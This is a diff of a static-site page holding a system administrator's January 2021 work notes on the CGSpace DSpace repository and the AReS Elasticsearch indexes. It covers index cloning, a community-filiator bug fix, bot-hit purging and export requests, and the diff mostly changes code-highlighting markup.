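curl -s -X POST &#34;$ES/openrxv-items-temp/_clone/openrxv-items&#34;
curl -s -XDELETE &#34;$ES/openrxv-items-temp&#34;
</code></pre>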

View File

@ -50,7 +50,7 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -160,29 +160,29 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, back up the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100278,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-04&#39;</span>
</code></pre></div><h2 id="2021-01-04">2021-01-04</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100278,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-04&#39;</span>
</span></span></code></pre></div><h2 id="2021-01-04">2021-01-04</h2>
<ul>
<li>There is one item that appears twice in AReS: <a href="https://cgspace.cgiar.org/handle/10568/66839">10568/66839</a>
<ul>
@ -214,8 +214,8 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./doi-to-handle.py -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -i /tmp/dois.txt -o /tmp/out.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./doi-to-handle.py -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -i /tmp/dois.txt -o /tmp/out.csv
</span></span></code></pre></div><ul>
<li>Help Udana export IWMI records from AReS
<ul>
<li>He wanted me to give him CSV export permissions on CGSpace, but I told him that this requires super admin rights, so I&rsquo;m not comfortable with it</li>
@ -261,28 +261,28 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-01-10 10:03:27,692 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID=&#34;TX35636856957739531161091194485578658698&#34;)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-01-10 10:03:27,692 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID=&#34;TX35636856957739531161091194485578658698&#34;)
</span></span></code></pre></div><ul>
<li>I filed <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=907">a bug on Atmire&rsquo;s issue tracker</a></li>
<li>Peter asked me to move the CGIAR Gender Platform community to the top level of CGSpace, but I got an error when I used the community-filiator command:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
Loading @mire database changes for module MQM
Changes have been processed
Exception: null
java.lang.UnsupportedOperationException
at java.util.AbstractList.remove(AbstractList.java:161)
at java.util.AbstractList$Itr.remove(AbstractList.java:374)
at java.util.AbstractCollection.remove(AbstractCollection.java:293)
at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>Exception: null
</span></span><span style="display:flex;"><span>java.lang.UnsupportedOperationException
</span></span><span style="display:flex;"><span> at java.util.AbstractList.remove(AbstractList.java:161)
</span></span><span style="display:flex;"><span> at java.util.AbstractList$Itr.remove(AbstractList.java:374)
</span></span><span style="display:flex;"><span> at java.util.AbstractCollection.remove(AbstractCollection.java:293)
</span></span><span style="display:flex;"><span> at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
</span></span><span style="display:flex;"><span> at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>There is apparently <a href="https://jira.lyrasis.org/browse/DS-3914">a bug</a> in DSpace 6.x that makes community-filiator not work (the <code>UnsupportedOperationException</code> above is the classic symptom of calling <code>remove()</code> on a fixed-size list)
<ul>
<li>There is <a href="https://github.com/DSpace/DSpace/pull/2178">a patch</a> for the as-yet unreleased DSpace 6.4, so I will try that</li>
@ -301,24 +301,24 @@ java.lang.UnsupportedOperationException
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
... after ten hours
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100411,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span><span style="display:flex;"><span>... after ten hours
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100411,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><ul>
<li>Looking over the last month of Solr stats I see a familiar bot that <em>should</em> have been marked as a bot months ago:</li>
</ul>
<blockquote>
@ -331,9 +331,9 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat log/dspace.log.2020-12-2* | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71&#39;</span> | sort | uniq | wc -l
0
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat log/dspace.log.2020-12-2* | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>0
</span></span></code></pre></div><ul>
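<li>The <code>check-spider-ip-hits.sh</code> script used below reads its IPs from a file, so the offending address goes into <code>/tmp/ips</code> first (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ echo &#39;64.62.202.71&#39; &gt; /tmp/ips
</code></pre><ul>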
<li>So now I should really add it to the DSpace spider agent list so it doesn&rsquo;t create Solr hits
<ul>
<li>I added it to the &ldquo;ilri&rdquo; lists of spider agent patterns</li>
@ -341,8 +341,8 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>I purged the existing hits using my <code>check-spider-ip-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
</code></pre></div><h2 id="2021-01-11">2021-01-11</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
</span></span></code></pre></div><h2 id="2021-01-11">2021-01-11</h2>
<ul>
<li>The AReS indexing finished this morning and I moved the <code>openrxv-items-temp</code> index to <code>openrxv-items</code> (see above)
<ul>
@ -351,8 +351,8 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>I deployed the community-filiator fix on CGSpace and moved the Gender Platform community to the top level of CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
</code></pre></div><h2 id="2021-01-12">2021-01-12</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
</span></span></code></pre></div><h2 id="2021-01-12">2021-01-12</h2>
<ul>
<li>IWMI is really pressuring us to have a periodic CSV export of their community (see the cron sketch after this list)
<ul>
@ -393,29 +393,29 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
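<ul>
<li>One possibility for the periodic IWMI export is a nightly cron job around <code>dspace metadata-export</code>; a sketch in which the schedule, the output path, and the community handle are all placeholders:</li>
</ul>
<pre tabindex="0"><code># m h dom mon dow command
0 2 * * * /path/to/dspace/bin/dspace metadata-export -i [IWMI community handle] -f /path/to/iwmi.csv
</code></pre>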
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, back up the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100540,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-18&#39;</span>
</code></pre></div><h2 id="2021-01-18">2021-01-18</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100540,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-18&#39;</span>
</span></span></code></pre></div><h2 id="2021-01-18">2021-01-18</h2>
<ul>
<li>Finish the indexing on AReS that I started yesterday</li>
<li>Udana from IWMI emailed me to ask why the iwmi.csv doesn&rsquo;t include items he approved to CGSpace this morning
@ -462,9 +462,9 @@ localhost/dspace63= &gt; COMMIT;
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker exec -it api /bin/bash
# apt update <span style="color:#f92672">&amp;&amp;</span> apt install unoconv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker exec -it api /bin/bash
</span></span><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt install unoconv
</span></span></code></pre></div><ul>
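<li>Packages installed with <code>docker exec</code> disappear when the container is recreated; a hedged stopgap is to commit the running container to a local image (the tag here is arbitrary):</li>
</ul>
<pre tabindex="0"><code>$ docker commit api openrxv-api:with-unoconv
</code></pre><ul>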
<li>Help Peter get a list of titles and DOIs for CGSpace items that Altmetric does not have an attention score for
<ul>
<li>He generated a list from their dashboard and I extracted the DOIs in OpenRefine (because it was WINDOWS-1252 and csvcut couldn&rsquo;t do it)</li>
@ -512,30 +512,30 @@ localhost/dspace63= &gt; COMMIT;
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, back up the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100699,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-25&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100699,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;settings&#34;</span>: <span style="color:#f92672">{</span><span style="color:#e6db74">&#34;index.b
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"></span>locks.write&#34;:true}}&#39;
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-25&#39;</span>
</span></span></code></pre></div><ul>
<li>Resume working on CG Core v2; I realized a few things:
<ul>
<li>We are trying to move from <code>dc.identifier.issn</code> (and ISBN) to <code>cg.issn</code>, but this is currently implemented as a &ldquo;qualdrop&rdquo; input in DSpace&rsquo;s submission form, which only works to fill in the qualifier (i.e. <code>dc.identifier.xxxx</code>)
@ -601,12 +601,12 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
<li>I <a href="https://jira.lyrasis.org/browse/DS-4566">filed a bug</a> on DSpace&rsquo;s issue tracker (though I accidentally hit Enter and submitted it before I finished, and there is no edit function)</li>
<li>Looking into Linode report that the load outbound traffic rate was high this morning:</li>
</ul>
